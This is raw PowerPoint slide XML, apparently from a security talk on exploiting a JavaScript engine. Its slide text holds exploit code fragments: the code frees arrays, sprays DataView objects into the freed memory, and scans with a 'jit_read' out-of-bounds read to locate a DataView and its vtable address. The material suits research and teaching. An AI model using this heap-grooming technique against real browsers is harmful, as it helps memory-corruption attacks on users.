              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(i%2==0)    {</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0;}	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Release integer arrays of even subscripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Array(0x50000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for(var </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=0;i&lt;0x50000;i++)	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]=new </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buf,0,i);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Allocate a large number of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="组合 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B29C57B2-2CA7-4AAC-AB1E-EAEF2D8E94D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5721631" y="4045986"/>
            <a:ext cx="6326441" cy="3978897"/>
            <a:chOff x="12549325" y="5188849"/>
            <a:chExt cx="11850412" cy="7453096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="组合 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA8A0CA-79A1-4D3E-AE1F-EB2715341CB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12579188" y="5188849"/>
              <a:ext cx="11820549" cy="7453096"/>
              <a:chOff x="12579187" y="5188848"/>
              <a:chExt cx="7670443" cy="4836369"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="图片 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5913CC-E542-4180-88D2-96BED57FA4F7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12599987" y="5188848"/>
                <a:ext cx="7649643" cy="1143160"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="图片 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{553BC940-68EA-4F18-8503-6CB10449070F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12599985" y="6340664"/>
                <a:ext cx="7611537" cy="438211"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="图片 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356947FB-A9E1-4323-9FB2-7D09239F8E3D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12579187" y="7961524"/>
                <a:ext cx="7582958" cy="447737"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="图片 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92BE2CA-A848-42B5-BDFB-C3750C4DBC17}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12579187" y="8415492"/>
                <a:ext cx="7553325" cy="1152525"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="图片 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1DAC07-720D-424C-B2F2-9AE8B63C827A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12579187" y="9568017"/>
                <a:ext cx="7610475" cy="457200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图片 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30496657-6106-4B31-A493-7D29E3CD5A1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12549325" y="7675983"/>
              <a:ext cx="11669928" cy="1735902"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0288AA31-3A0B-49FC-9FB4-A241DAEBDDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754687" y="3127709"/>
            <a:ext cx="6276894" cy="772776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object is allocated at the location of the released integers array</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="695308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3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B8902C1-4921-4D3D-A575-84DA80A793C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016656" y="2550693"/>
            <a:ext cx="4753701" cy="6247864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to locate this </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for(var begin=0x40000/4;;begin+=0x12){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index = begin;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jit_read</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(index);index=begin+2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jit_read</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(index);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>==0x5 &amp;&amp; tmp2==0x7f9)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        index = begin+ 0x20;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jit_read</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(index);index=begin+2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        tmp2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jit_read</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(index);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ==0x5 &amp;&amp; tmp2==0x7f9)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dataview_index</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = index – 0x10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vt_low</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dataview_index</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – 0x08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
